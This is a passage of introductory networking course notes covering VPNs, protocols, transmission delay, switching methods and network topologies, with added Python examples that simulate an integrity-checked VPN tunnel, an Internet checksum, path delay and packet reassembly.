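        """Wrap an inner packet: outer header | SPI | seq | E(inner) | ICV."""
        self.send_seq += 1
        hdr = ESP_HDR.pack(self.spi, self.send_seq)
        ct = _xor(inner, _keystream(self.enc_key, self.spi, self.send_seq, len(inner)))
        icv = hmac.new(self.mac_key, hdr + ct, hashlib.sha256).digest()[:ICV_LEN]
        return self.outer + hdr + ct + icv

    def decapsulate(self, packet: bytes) -> bytes:
        """Verify first, then check replay, then decrypt. Raises ValueError on rejection."""
        esp, icv = packet[OUTER_HDR.size:-ICV_LEN], packet[-ICV_LEN:]
        expected = hmac.new(self.mac_key, esp, hashlib.sha256).digest()[:ICV_LEN]
        if not hmac.compare_digest(icv, expected):
            raise ValueError("integrity check failed")
        spi, seq = ESP_HDR.unpack(esp[:ESP_HDR.size])
        if spi != self.spi:
            raise ValueError("unknown SPI")
        if seq <= self.highest_seen:
            raise ValueError("replayed packet")
        self.highest_seen = seq
        ct = esp[ESP_HDR.size:]
        return _xor(ct, _keystream(self.enc_key, spi, seq, len(ct)))


def deliver(receiver: EspTunnel, packet: bytes) -> Tuple[str, object]:
    """Receiver outcome as data: ('ok', inner_packet) or ('rejected', reason)."""
    try:
        return "ok", receiver.decapsulate(packet)
    except ValueError as err:
        return "rejected", str(err)


def tamper(packet: bytes, offset: int) -> bytes:
    """Flip one bit of the packet, as an on-path attacker might."""
    out = bytearray(packet)
    out[offset] ^= 0x01
    return bytes(out)


# Constructed tunnel between two site gateways (documentation addresses).
ENC_KEY, MAC_KEY, SPI = b"\x11" * 32, b"\x22" * 32, 0x1001
SITE_A, SITE_B = bytes([203, 0, 113, 10]), bytes([198, 51, 100, 20])
INNER = b"constructed inner packet: 10.1.0.5 -> 10.2.0.9 GET /payroll"


def demo() -> dict:
    a = EspTunnel(ENC_KEY, MAC_KEY, SPI, SITE_A, SITE_B)
    b = EspTunnel(ENC_KEY, MAC_KEY, SPI, SITE_B, SITE_A)
    pkt = a.encapsulate(INNER)
    return {
        "inner_visible_on_wire": INNER in pkt,
        "first_delivery": deliver(b, pkt),
        "replay": deliver(b, pkt),
        "tampered": deliver(b, tamper(pkt, OUTER_HDR.size + ESP_HDR.size)),
        "next_packet": deliver(b, a.encapsulate(b"second packet")),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

Order matters in decapsulate(): the ICV is checked before anything is parsed or decrypted (encrypt-then-MAC, as ESP does), so a tampered or forged packet is dropped without touching the cipher, and the sequence-number check stops a captured packet from being replayed. Access control is what the gateway does with the decrypted inner packet afterwards and is not modelled here.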
Secure VPN
• All traffic on the VPN must be encrypted and authenticated, then sent along virtual tunnels
• Secure VPN technologies
– Internet Protocol Security (IPsec), which functions in both transport and tunnel mode
• Allows the secure transmission of data over public IP-based networks
• Uses standard encryption algorithms to provide confidentiality (AES – Advanced Encryption Standard)
• Provides authentication via digital certificates or pre-shared keys
– Transport Layer Security (TLS), the successor of Secure Sockets Layer (SSL), with encryption
• These are much simpler than IPsec-based VPNs
• A browser-based (clientless) TLS VPN does not require special client software, because all web servers and web browsers support TLS; full-tunnel TLS VPNs still need a client program
Trusted VPN
• Over the years, implementations of trusted VPNs have moved from
raw private circuits leased from telecommunications vendors to
private IP network circuits leased from Internet providers.
• All traffic on the VPN relies on the security of a provider’s network.
• Layer 2 VPNs implemented using
– Asynchronous transfer mode (ATM) circuits
– Frame relay circuits
– Transport of layer 2 frames over Multiprotocol Label Switching (MPLS)
– All these transmit packets via a fixed path (just like circuit switching; differences exist in the size of data and the controlling mechanisms)
• Layer 3 VPNs
– MPLS with constrained distribution of routing information through Border
Gateway Protocol (BGP)
– Multiprotocol Label Switching (MPLS) is a type of data-carrying service for high-
performance telecommunications networks that directs data from one network
node to the next based on short path labels rather than long network
addresses, avoiding complex lookups in a routing table.
Hybrid VPN
• A combination of both secure and trusted
technologies or a combination of two VPN
technologies
Common VPN types
• Site to site VPN
– This type connects entire networks and facilitates secure data interchange between different sites.
– A site-to-site VPN eliminates the need for each computer to run VPN client software as it would on a remote-access VPN.
– A VPN gateway at each site accomplishes this.
– A VPN gateway is a router, firewall or dedicated appliance that connects two or more networks together in a VPN infrastructure
Common VPN types
• Remote Access VPN
– This type connects individual hosts to private networks and facilitates teleworkers who need to access their company's network securely using the Internet.
– Every host has VPN client software installed
• Remote Access VPNs provide remote connectivity to telecommuters and mobile users. They are typically an alternative to dedicated dial-up or ISDN connections. They offer users a range of connectivity options as well as a much lower cost solution.

Intranet VPNs link corporate headquarters, remote offices, and branch offices over a shared infrastructure using dedicated connections. The VPN typically is an alternative to a leased line. It provides the benefit of extended connectivity and lower cost.

Extranet VPNs link customers, suppliers, partners, or communities of interest to a corporate intranet over a shared infrastructure using dedicated connections. In this example, the VPN is often an alternative to fax, snail mail, or EDI. The extranet VPN facilitates e-commerce.
Summary
• Tunnelling protocols;
– Allow the data to be encapsulated/hidden whilst travelling across the Internet;
• Encryption protocols (IPsec);
– If the traffic is intercepted it cannot be read without the key;
• The use of gateways;
– Allow connection to the company's server;
Safety in VPN
• Authentication; nobody outside the VPN should be able to affect the security properties of the VPN (it must be impossible for an attacker to weaken or change the encryption, or to negotiate themselves into the tunnel);
• Encryption; data intercepted will not be readable;
• Tunnelling software; the security properties of each tunnel should be agreed by the administrators of the two endpoints of the tunnel;
• Multiple exit nodes; makes it hard to determine where the data originated, so traffic is harder to trace back to its source;
VPN vs Extranet
• A VPN authenticates the sender before establishing the tunnel;
• VPN traffic is always encrypted in transit, whereas an extranet may only encrypt selected services;
• VPN users are usually placed on the internal network and can reach whatever the administrator allows, typically far more than extranet users, who only have access to specific enabled services;
VPN vs Intranet
• Intranet is a type of network while VPN is a method of connecting distant
computers
• A VPN goes through a public network while an Intranet does not have to
• With Intranets, the computers are usually located in the same vicinity so
there is little or no need to utilize the Internet and employ complicated
encryption systems.
• An Intranet is just a local network that utilizes the same technologies that
the Internet does (e.g. HTTP, SMTP, FTP) in order to simplify things and
make it a lot easier for members of the organization to access resources
and share data.
• On the other hand, VPN was created to address the need for inexpensive
and secure connections between distant offices. Prior to VPN, leased lines
provided a secure but very expensive means of achieving this.
VPN advantages
• Communication is easier
• Companies take advantage of Internet to provide secure connections
• Decreases operational costs versus traditional WANs
• Employees work as if they were directly connected to the company’s network
• Extends connectivity across numerous geographic sites without the use of
leased lines
• Improves overall productivity
• Offers the flexibility to employees to take advantage of the company’s
intranet over an existing internet connection
• Offers flexibility to remote offices
• Offers global networking opportunities
• Reduces environmental footprint
• Reduces travel times / travel costs for remote users
• Simplifies network topology for administrators and companies
VPN Disadvantages
• VPNs require an in-depth understanding of public network
security issues and proper deployment of precautions.
• The availability and performance of an organization's wide-area
VPN (over the Internet in particular) depend on factors largely
outside of its control (because of the dependency on the public
network)
• VPN technologies from different vendors may not work well
together due to immature standards.
• VPNs need to accommodate protocols other than IP and
existing ("legacy") internal network technology.
• Security vulnerability if user PCs are used (Some companies
insist on company owned systems for VPN)
Protocol, data packet
• Protocol: a set of rules that communicating parties use when
using a communication network.
• A set of rules to coordinate data transmission (between a sender
and a receiver);
• Protocols are sets of rules that ensure a process is carried out
correctly; they are used in each layer to ensure communication.
For example, in the physical layer the protocols could define the
methods for opening and closing communication;
• Data packet: the compartmentalized pieces of information into
which a message is broken down in a packet-switching network
system. It is the basic unit of transmission, has a fixed format and
contains addresses (source and destination) and a sequence number
Protocol for general communication
• Presence of an identified sender
• Presence of an identified receiver
• Presence of an agreed upon method of communicating
• Presence of common language
• Presence of common grammar
• Presence of an agreed upon speed and timing of
delivery
• Presence of confirmation/acknowledgement
requirements
Computer Network Protocols provide
• Rules about message format
• Rules about the way intermediary devices should
facilitate communication
• Rules about initiation and termination of a
communication session
• Rules about the type of error checking, error
detection and correction mechanisms to be used
• Rules about data compression methods
• Rules about recovery / resending of data
Why are protocols necessary?
• Data integrity
– To verify that the information received is exactly the same as the information sent (accuracy
and consistency of data), e.g. a checksum
• Source integrity
– The identity of the sender has been validated. Digital signatures provide source integrity
• Flow control
– If the receiver is relatively slow at reading the data, the sender can very easily overflow the connection’s receive
buffer by sending too much data too quickly.
• Feedback based (the receiver notifies the sender when to send more data)
• Rate based (an algorithm alters the sending rate)
• Deadlock detection and prevention
– A deadlock is a situation in which two or more competing actions are each waiting for the other to finish, and thus
neither ever does.
– Occurs because of lost signals
– A persistence timer is used to resolve the situation
• Congestion control
– Congestion control concerns controlling traffic entry into a network, so as to avoid over-usage of any of the
processing or link capabilities of the intermediate nodes and networks, for example by reducing the rate of sending packets.
– Congestion can lead to queuing delay, packet loss and blocking of new connections.
– It should not be confused with flow control, which prevents the sender from overwhelming the receiver.
• Error detection and correction
– This enables reliable delivery of data over an unreliable channel (channel noise)
– Errors may be introduced during transmission
– Error checking allows detection and reconstruction of the original data
– Example: a checksum included as part of the packet
• To ensure data integrity; to control data flow; to provide error checking;
to minimize congestion; to prevent deadlock; to allow interoperability;
• Protocols generally define the syntax/structure of the data and the
semantics/meaning of the bits
• They also define the timing (how fast, when, how much)
• Direct / Indirect
– Point-to-point link
– Multipoint link (the protocol should define the access control here)
• Symmetric / Asymmetric
– Symmetric protocols involve communication between peer entities.
– Asymmetry may be dictated by the logic of an exchange (e.g. a client and a
server process) and the desire to keep one of the entities or systems as simple as
possible.
– Protocols should address this
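As an added illustration of the checksum the slide names as a data-integrity and error-detection mechanism (example code, not part of the original slides): the 16-bit one's-complement checksum used by IP, TCP and UDP (RFC 1071), carried in a constructed toy packet header.

```python
"""Checksum as a per-packet data-integrity check (added example).

Implements the 16-bit one's-complement Internet checksum (RFC 1071). The sender
stores the checksum in the packet; the receiver recomputes the one's-complement
sum over the whole packet, checksum field included, and expects 0xFFFF.
The packet header layout used here is a constructed toy format.
"""
import struct


def ones_complement_sum(data: bytes) -> int:
    """Sum the 16-bit big-endian words of data with end-around carry.
    An odd trailing byte is padded with a zero byte, as RFC 1071 specifies."""
    if len(data) % 2:
        data += b"\x00"
    total = 0
    for (word,) in struct.iter_unpack("!H", data):
        total += word
        total = (total & 0xFFFF) + (total >> 16)   # fold the carry back in
    return total


def checksum(data: bytes) -> int:
    """Internet checksum: one's complement of the folded 16-bit sum."""
    return (~ones_complement_sum(data)) & 0xFFFF


def build_packet(src: int, dst: int, seq: int, payload: bytes) -> bytes:
    """Sender side. Toy header: 2-byte source, 2-byte destination, 2-byte
    sequence number, 2-byte checksum, followed by the payload.
    The checksum field is zero while the checksum is computed (as in IP/UDP)."""
    header = struct.pack("!HHHH", src, dst, seq, 0)
    csum = checksum(header + payload)
    return struct.pack("!HHHH", src, dst, seq, csum) + payload


def verify_packet(packet: bytes) -> bool:
    """Receiver side. Summing the whole packet including the stored checksum
    gives 0xFFFF when no detectable corruption occurred."""
    return ones_complement_sum(packet) == 0xFFFF


def corrupt_byte(packet: bytes, index: int) -> bytes:
    """Simulate channel noise: flip one bit of the byte at index."""
    damaged = bytearray(packet)
    damaged[index] ^= 0x01
    return bytes(damaged)


if __name__ == "__main__":
    pkt = build_packet(src=1, dst=2, seq=7, payload=b"hello")   # constructed sample
    print("intact packet verifies:", verify_packet(pkt))
    print("corrupted packet verifies:", verify_packet(corrupt_byte(pkt, 8)))
```

The check catches single-bit and most multi-bit errors, but not every one: swapping two whole 16-bit words leaves the sum unchanged, which is why stronger codes (CRCs, and MACs where tampering rather than noise is the concern) are used where that matters.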
Why can the speed of data transmission across a
network vary?
• Different media support different transfer speeds
• The main unit to measure data transfer is bps
• We use kbps and Mbps
• The theoretical speed of data in a medium is the bandwidth
• It depends on the physical properties of the medium and the signalling
technique used
• The actual transfer rate is called throughput
• It is affected by interference, traffic, the number of connected devices and
errors
• In a network with many segments, the slowest segment creates a
bottleneck that limits the throughput of the network
• Goodput measures the transfer rate of usable data
Why can the speed of data transmission across a
network vary?
• Nodal processing:
– Packet header examination
– Error checking
– Packets are placed in a queue. The delay depends on the number of items in the queue.
• Transmission delay:
– L/R = time to push the bits of a packet into the link
– R = link bandwidth (bps)
– L = packet length (bits)
• Propagation delay:
– d/s
– d = length of the physical link
– s = propagation speed in the medium
• Many users may want to transmit data through the network at the same time
• Interference to the network from outside can corrupt many data packets, causing them to be
retransmitted
• Different parts of the network use different media;
• Network congestion;
• Packets may take different routes;
• The receiver may be busy;
• Physical size of the network;
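An added worked example (not from the slides) that carries the transmission delay L/R, propagation delay d/s and nodal processing delay over a whole multi-link path, and identifies the slowest segment as the bottleneck; the link values are constructed sample figures.

```python
"""End-to-end delay of one packet over a multi-link path (added example).

Uses the delay components named on the slide: transmission delay L/R and
propagation delay d/s per link, plus a fixed per-node processing delay.
Queueing delay is not modelled. Nodes are store-and-forward (a node must
receive the whole packet before it can start sending it on), so the per-link
delays add up. Link parameters below are constructed sample values.
"""
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Link:
    name: str
    rate_bps: float          # R: link bandwidth in bits per second
    length_m: float          # d: physical length of the link in metres
    prop_speed_mps: float    # s: propagation speed in the medium (m/s)


def transmission_delay(L_bits: float, R_bps: float) -> float:
    """L/R: time to push all bits of the packet onto the link."""
    return L_bits / R_bps


def propagation_delay(d_m: float, s_mps: float) -> float:
    """d/s: time for one bit to travel the length of the link."""
    return d_m / s_mps


def path_delay(L_bits: float, links: List[Link],
               nodal_processing_s: float = 0.0) -> Dict[str, float]:
    """Per-link and total one-way delay for a packet of L bits.

    Every intermediate node (one fewer than the number of links) adds
    nodal_processing_s for header examination and error checking.
    """
    result: Dict[str, float] = {}
    total = 0.0
    for link in links:
        d = (transmission_delay(L_bits, link.rate_bps)
             + propagation_delay(link.length_m, link.prop_speed_mps))
        result[link.name] = d
        total += d
    total += nodal_processing_s * max(len(links) - 1, 0)
    result["total"] = total
    return result


def bottleneck(links: List[Link]) -> Link:
    """The slowest segment bounds the throughput of the whole path."""
    return min(links, key=lambda link: link.rate_bps)


# Constructed example path: office LAN -> long-haul WAN link -> data-centre LAN.
# Propagation speed of about 2e8 m/s is typical for copper and fibre.
SAMPLE_PATH = [
    Link("office-lan", rate_bps=1e9, length_m=100, prop_speed_mps=2e8),
    Link("wan", rate_bps=10e6, length_m=1_000_000, prop_speed_mps=2e8),
    Link("dc-lan", rate_bps=100e6, length_m=50, prop_speed_mps=2e8),
]
PACKET_BITS = 1500 * 8   # a 1500-byte packet

if __name__ == "__main__":
    delays = path_delay(PACKET_BITS, SAMPLE_PATH, nodal_processing_s=50e-6)
    for name, secs in delays.items():
        print(f"{name:>10}: {secs * 1e3:8.3f} ms")
    print("bottleneck:", bottleneck(SAMPLE_PATH).name)
```

Running it shows that on the long WAN link the propagation term (5 ms) dwarfs the transmission term (1.2 ms), while on the LAN links both are negligible; raising LAN bandwidth therefore changes nothing if the WAN segment stays the bottleneck.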
Factors that affect the speed of data
transmission
• Bandwidth of the network
• Data transfer rate of storage devices
• Interferences
• Malicious software
• Number of connected devices
• Number of users and their demand at any particular time (traffic)
• Packet loss and retransmission
• Read speed of storage devices
• Slowest segment
• Speed, technology and capacity of the network server
• Time required for user authentication and various security checks
• Types of files sent
• Type of transmission medium
• User’s PC CPU speed
• User’s RAM / disk caching
• User’s PC various subsystem performance
Why is compression of data often necessary
when transmitting across a network?
• Data compression – reducing the amount of space needed to
store/transmit a piece of data
• Reduction of bits by encoding data using fewer bits than the original
representation
• The Web and its underlying networks have inherent bandwidth
restrictions which define the maximum number of bits or bytes that can
be transmitted from one place to another in a fixed amount of time.
• Earlier, data transmission often happened through the slow phone
network, so compressing data for faster transmission was essential.
• Today, transmission speeds have greatly increased, but we are
transmitting far more data over the networks than earlier (movies, social
media, news), so compression is needed to be able to transmit the
enormous amounts of data without using up all the bandwidth.
– Result: faster transmission
Why is compression of data often necessary
when transmitting across a network?
• Lossy compression – some loss of information is
acceptable here. There is no way to get the original file
back. E.g. JPEG, MPEG-2
• Lossless compression – reduces the number of bits by first
identifying and then eliminating statistical redundancy
• GIF (Graphics Interchange Format) – lossless
compression. Works for graphic files that have fewer
than 256 colours
• MP3 – audio coding format – lossy technique
• MPEG-2 – lossy audio and video compression
Characteristics of different transmission
media
• Factors to be considered
– Speed
– Reliability
– Cost
– Security
Characteristics of different transmission
media
• Guided Media
• Fibre Optics
– An optical fibre is a thin, flexible medium which conducts quick pulses of light
– Fibre optics can transfer hundreds of gigabits per second and is not affected by electromagnetic interference
– Suitable for long distances with fewer repeaters
– Much higher bandwidth
– Smaller size and light weight
• Twisted Pair
– Twisted pair copper cables are the most inexpensive type of transmission media and have been used for
many years by phone companies.
– Two copper wires are twisted together and coated with a protective layer.
– Limited in terms of data rate and distance
– UTP – Unshielded Twisted Pair – used in LANs. Easy to install, prone to electrical interference. Low cost of
installation, good for short distances between repeaters, used in telephone networks
– STP – Shielded Twisted Pair – more difficult to install than UTP, reduced interference
• Coaxial Cable
– Like twisted pair, coaxial cable consists of two copper conductors, but instead of being parallel, they are concentric.
– With its construction and special type of shielding and insulation, coaxial cable can carry a lot more bits
much faster than twisted pair.
– Can support higher data rates compared to twisted pair
Characteristics of different transmission
media
• Unguided Media
• Radio Waves (omni directional) / Micro waves (Line of Sight)
– Price varying by size of network (WLAN is usually cheap)
– Used for mobile telephone network and LANs
– Average speed
– Average reliability
– Insecure communication
– Works well for rough terrains
– Weather conditions affect the performance
• Satellite – uses specific frequencies for uplink and downlink, use of transponders
• Infrared – very short distance, cannot pass through objects, LOS required, better
security
• RFID - Radio-frequency identification uses electromagnetic fields to automatically
identify and track tags attached to objects.
• Bluetooth – uses very low power, short distance
• Free Space Optics – Use of lasers, LOS or use of mirrors to reflect, affected by weather
Data transmitted by packet switching
• Packet switching is a method of transmitting information over a computer
network.
• The information is broken down into smaller pieces, the packets, which are then transmitted
across the network.
• Every packet contains:
– The source of the packet
– The destination of the packet
– The length of the information part
– A running (sequence) number of the packet
– A classification of the packet
• The packets are transported as individual and independent units through the
network, so they can travel by many different routes.
• At the receiving end, they are reassembled in order using their sequence numbers.
• Each packet also has a counter which is decremented as it passes through a
node. When it becomes zero, the packet is discarded.
• Each router in a WAN decides on the route to be taken by the packet depending
on the destination address and the shortest path.
• On an error or a collision, the sender is requested to resend the packet.
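The packet life cycle described on this slide, as an added simulation (example code, not from the slides; the packet layout and the sample message are constructed): splitting a message into numbered packets, decrementing the hop counter at each node and discarding at zero, and reassembling out-of-order packets by sequence number.

```python
"""Packet switching as described on the slide (added example; layout constructed).

A message is split into packets carrying source, destination, the length of
the information part, a running sequence number, a classification and a hop
counter. Every node on the route decrements the counter and discards the packet
when it reaches zero. Packets travel independently (so they may arrive out of
order) and the receiver reassembles them by sequence number; sequence numbers
that never arrive are what the receiver would ask the sender to resend.
"""
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple
import random


@dataclass
class Packet:
    src: str
    dst: str
    seq: int            # running number of the packet within the message
    total: int          # how many packets the message was split into
    kind: str           # classification of the packet, e.g. "data"
    hops_left: int      # counter decremented at every node; discarded at zero
    payload: bytes

    @property
    def length(self) -> int:
        """Length of the information part."""
        return len(self.payload)


def packetize(src: str, dst: str, message: bytes, max_payload: int,
              hops: int = 8, kind: str = "data") -> List[Packet]:
    """Break a message into packets of at most max_payload bytes each."""
    chunks = [message[i:i + max_payload]
              for i in range(0, len(message), max_payload)] or [b""]
    return [Packet(src, dst, seq, len(chunks), kind, hops, chunk)
            for seq, chunk in enumerate(chunks)]


def forward(packet: Packet, nodes_on_route: int) -> Optional[Packet]:
    """Carry the packet through nodes_on_route intermediate nodes.

    Each node decrements the hop counter; a packet whose counter reaches zero
    is discarded (None), which stops a misrouted packet circulating forever.
    """
    for _ in range(nodes_on_route):
        packet.hops_left -= 1
        if packet.hops_left <= 0:
            return None
    return packet


def reassemble(received: List[Packet]) -> Tuple[Optional[bytes], List[int]]:
    """Reorder by sequence number. Returns (message, missing sequence numbers);
    the message is None while any packet of the message is still missing."""
    if not received:
        return None, []
    total = received[0].total
    by_seq = {p.seq: p for p in received}
    missing = [seq for seq in range(total) if seq not in by_seq]
    if missing:
        return None, missing
    return b"".join(by_seq[seq].payload for seq in range(total)), []


def simulate(message: bytes, max_payload: int, route_length: Callable[[int], int],
             hops: int = 8) -> Tuple[Optional[bytes], List[int]]:
    """Send a message from A to B. route_length(seq) is the number of nodes the
    routers happen to choose for packet seq (different packets, different routes)."""
    packets = packetize("A", "B", message, max_payload, hops)
    delivered = [p for p in (forward(p, route_length(p.seq)) for p in packets)
                 if p is not None]
    random.Random(1).shuffle(delivered)   # independent routes: arrival order differs
    return reassemble(delivered)


if __name__ == "__main__":
    msg = b"The quick brown fox jumps over the lazy dog"   # constructed sample
    print(simulate(msg, 10, lambda seq: 3))                   # full message back
    print(simulate(msg, 10, lambda seq: 20 if seq == 2 else 3))  # packet 2 dropped
```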
Data transmitted by packet switching
• Advantages:
– Because single packets are small, waiting times are low, and because
packets can travel through multiple channels independently, the
network will be utilized better.
– Resources will be given fairly to participants in the network.
– Because of the small packet size, transmission errors can be detected fast.
– High resilience against failures. If part of the network fails,
packets can be routed around the broken transmission lines.
• Disadvantages:
– Because transport routes are not fixed, overloading can occur at
transmitting stations.
– Packets don't arrive in order (they can take separate routes).
– All participants have to use the same network protocols.
– No constant bandwidth can be guaranteed and big fluctuations in
bandwidth can happen.
Circuit Switching
• In modern circuit-switched networks, electronic signals pass through several
switches before a connection is established.
• During a call no other network traffic can use those switches.
• The resources remain dedicated to the circuit during the entire data transfer
and the entire message follows the same path.
• Circuit switching can be analog or digital.
Advantages
• Circuit is dedicated to the call – no interference, no sharing
• Guaranteed the full bandwidth for the duration of the call
• Guaranteed quality of service
Disadvantages
• Inefficient – the equipment may be unused for the period of the call; if no data is being
sent, the dedicated line still remains open.
• It takes a relatively long time to set up the circuit.
• During a crisis or disaster, the network may become unstable or unavailable.
• It was primarily developed for voice traffic rather than data traffic.
Virtual circuit switching is a packet switching technology that emulates circuit switching, in
the sense that the connection is established before any packets are transferred, and packets
are delivered in order.
Message Switching
• No need for a dedicated path to be established between two
nodes.
• When a station sends a message, it appends a destination address
to the message.
• The message is then transmitted through the network, in its
entirety, from node to node.
• Each node receives the entire message, stores it briefly and then
transmits it to next node.
• A delay is introduced due to time required to find the next node in
the transmission path and then send the message.
• Network using message switching is also called “Store-and-
Forward” network.
Network Topologies
• Computer network topology is the way various
components of a network (like nodes, links,
peripherals, etc) are arranged.
• Network topologies define the layout, virtual
shape or structure of network.
• The way in which different systems and nodes
are connected and communicate with each
other is determined by topology of the
network.
Bus Topology
• Simplest
• All the nodes (computers as well as servers) are connected to a single cable
(called the bus) with the help of interface connectors.
• This central cable is the backbone of the network and is known as the Bus.
• Every workstation communicates with the other devices through this Bus.
• A signal from the source is broadcast and travels to all workstations
connected to the bus cable.
• Although the message is broadcast, only the intended recipient, whose
MAC address or IP address matches, accepts it.
• If the MAC/IP address of a machine doesn’t match the intended address, the
machine discards the signal.
• A terminator is added at the ends of the central cable to prevent bouncing of
signals.
• A barrel connector can be used to extend it.
Bus Topology
• Advantages (benefits) of Linear Bus Topology
1) It is easy to set up and extend a bus network.
2) The cable length required for this topology is the least compared to others.
3) Bus topology costs very little.
4) Linear Bus networks are mostly used in small networks. Good for LANs.
• Disadvantages (drawbacks) of Linear Bus Topology
1) There is a limit on the central cable length and the number of nodes that can be connected.
2) Dependency on the central cable has its disadvantages: if the main cable
(i.e. the bus) encounters some problem, the whole network breaks down.
3) Proper termination is required to absorb signals; the use of terminators is a must.
4) It is difficult to detect and troubleshoot a fault at an individual station.
5) Maintenance costs can get higher with time.
6) The efficiency of a bus network reduces as the number of devices connected to it increases.
7) It is not suitable for networks with heavy traffic.
8) Security is very low because all the computers receive the signal sent from the source.
Star Topology
• In Star topology, all the components of network are
connected to the central device called “hub” which may
be a hub, a router or a switch.
• All the workstations are connected to central device with
a point-to-point connection.
• All the data on the star topology passes through the
central device before reaching the intended destination.
• The hub acts as a junction to connect the different nodes
present in the Star Network, and at the same time it
manages and controls the whole network.
• Depending on which central device is used, the “hub” can
act as a repeater or signal booster.
• The central device can also communicate with the hubs of
other networks.
• Unshielded Twisted Pair (UTP) Ethernet cable is used to
connect workstations to central node.
Star Topology
• Advantages of Star Topology
1) As compared to Bus topology it gives far better performance: signals don’t
necessarily get transmitted to all the workstations. A sent signal reaches the intended
destination after passing through no more than 3-4 devices and 2-3 links. The performance
of the network is dependent on the capacity of the central hub.
2) Easy to connect new nodes or devices. In star topology new nodes can be added
easily without affecting the rest of the network. Similarly, components can also be removed
easily.
3) Centralized management. It helps in monitoring the network.
4) Failure of one node or link doesn’t affect the rest of the network. At the same time it’s
easy to detect the failure and troubleshoot it.
• Disadvantages of Star Topology
1) Too much dependency on the central device has its own drawbacks. If it fails, the whole
network goes down.
2) The use of a hub, a router or a switch as the central device increases the overall cost of the
network.
3) Performance, as well as the number of nodes which can be added in such a topology, is
dependent on the capacity of the central device.
Ring Topology
• In Ring Topology, all the nodes are connected to each other in
such a way that they make a closed loop.
• Each workstation is connected to two other components on
either side, and it communicates with these two adjacent
neighbours.
• Data travels around the network in one direction.
• Sending and receiving of data takes place with the help of a TOKEN.
• Token passing (in brief): the token contains a piece of information
which, along with the data, is sent by the source computer.
• This token then passes to the next node, which checks if the signal
is intended for it.
• If yes, it receives it and passes the empty token into the
network; otherwise it passes the token along with the data to the next
node.
• This process continues until the signal reaches its intended
destination.
• Only the nodes holding the token are allowed to send data.
• Other nodes have to wait for an empty token to reach them.
• This network is usually found in offices, schools and small
buildings.
Ring Topology
• Advantages of Ring Topology
1) This type of network topology is very organized. Each node gets to send data when
it receives an empty token. This helps to reduce the chances of collision. Also, in ring topology
all the traffic flows in only one direction at very high speed.
2) Even when the load on the network increases, its performance is better than that of
Bus topology.
3) There is no need for a network server to control the connectivity between workstations.
4) Additional components do not affect the performance of the network.
5) Each computer has equal access to resources.
• Disadvantages of Ring Topology
1) Each packet of data must pass through all the computers between source and
destination. This makes it slower than Star topology.
2) If one workstation or port goes down, the entire network gets affected.
3) The network is highly dependent on the wire which connects the different components.
4) Network cards are expensive as compared to Ethernet cards and hubs.
Mesh Topology
• In a mesh network topology, each of the network nodes, computers
and other devices, is interconnected with one another.
• Every node not only sends its own signals but also relays data from
other nodes.
• In fact a true mesh topology is one where every node is
connected to every other node in the network.
• This type of topology is very expensive as there are many redundant
connections, thus it is not widely used in computer networks.
• It is commonly used in wireless networks.
• Flooding or routing technique is used in mesh topology.
1) Full Mesh Topology:
• In this, like a true mesh, each component is connected to every
other component.
• Even after considering the redundancy factor and cost of this
network, its main advantage is that the network traffic can be
redirected to other nodes if one of the nodes goes down.
• Full mesh topology is used only for backbone networks.
2) Partial Mesh Topology:
• Here, some of the systems are connected in a similar fashion as in
mesh topology while the rest of the systems are only connected to 1 or
2 devices.
• It can be said that in partial mesh, the workstations are ‘indirectly’
connected to other devices. This one is less costly and also reduces
redundancy.
Mesh Topology
• Advantages of Mesh topology
1) Data can be transmitted from different devices simultaneously. This topology can
withstand high traffic.
2) Even if one of the components fails there is always an alternative present. So data
transfer doesn’t get affected.
3) Expansion and modification of the topology can be done without disrupting other nodes.
• Disadvantages of Mesh topology
1) There is a high degree of redundancy in many of the network connections.
2) The overall cost of this network is way too high as compared to other network topologies.
3) Set-up and maintenance of this topology is very difficult. Even administration of the
network is tough.
Tree Topology
• Tree Topology integrates the
characteristics of Star and Bus
Topology.
• In Tree Topology, a number of Star Topology
networks are connected using a Bus.
• This main cable seems like the main
stem of a tree, and the other star
networks are the branches.
• It is also called Expanded Star
Topology.
• The Ethernet protocol is commonly used
in this type of topology.
Tree Topology
• Advantages of Tree Topology
1. It is an extension of Star and Bus Topologies, so in networks where these
topologies can't be implemented individually for reasons related to scalability, tree
topology is the best alternative.
2. Expansion of the network is possible and easy.
3. Here, we divide the whole network into segments (star networks), which can be
easily managed and maintained.
4. Error detection and correction is easy.
5. Each segment is provided with dedicated point-to-point wiring to the central hub.
6. If one segment is damaged, other segments are not affected.
• Disadvantages of Tree Topology
1. Because of its basic structure, tree topology relies heavily on the main bus cable;
if it breaks, the whole network is crippled.
2. As more and more nodes and segments are added, maintenance becomes
difficult.
3. Scalability of the network depends on the type of cable used.
Hybrid Topology
• Advantages of Hybrid Network Topology
1) Reliable: Unlike other networks, fault detection and troubleshooting is easy in this type of topology. The part in
which a fault is detected can be isolated from the rest of the network and the required corrective measures can be taken
WITHOUT affecting the functioning of the rest of the network.
2) Scalable: It’s easy to increase the size of the network by adding new components, without disturbing the existing
architecture.
3) Flexible: A hybrid network can be designed according to the requirements of the organization and by optimizing
the available resources. Special care can be given to nodes where traffic is high as well as where the chances of fault are
high.
4) Effective: Hybrid topology is the combination of two or more topologies, so we can design it in such a way that the
strengths of the constituent topologies are maximized while their weaknesses are neutralized. For example, we saw that Ring
Topology has good data reliability (achieved by use of tokens) and Star topology has high fault tolerance (as
each node is not directly connected to the others but through a central device), so these two can be used effectively in a
hybrid star-ring topology.
• Disadvantages of Hybrid Topology
1) Complexity of design: One of the biggest drawbacks of hybrid topology is its design. It’s not easy to design this
type of architecture and it’s a tough job for designers. The configuration and installation process needs to be very
efficient.
2) Costly hubs: The hubs used to connect two distinct networks are very expensive. These hubs are different from
usual hubs as they need to be intelligent enough to work with different architectures and should function even if a
part of the network is down.
3) Costly infrastructure: As hybrid architectures are usually larger in scale, they require a lot of cables, cooling
systems, sophisticated network devices, etc.
OS vs NOS (network operating system)
• Similarities
– Manage resources
– Manage access and permissions
– System software
• Differences
– NOS is more expensive to obtain, install and maintain
– NOS is installed on network servers
– NOS can also be found in a router or a hardware firewall
– NOS has the ability to manage multiple users, security
policies and other functions of a network
Software and Hardware firewall
• Similarities
– Both control data flow
– Same purpose – security
• Differences
– HW firewall used to protect many devices
– HW firewall more expensive
Wireless Communication
• Uses radio transmissions
Advantages and disadvantages of wireless
networks
• Advantages:
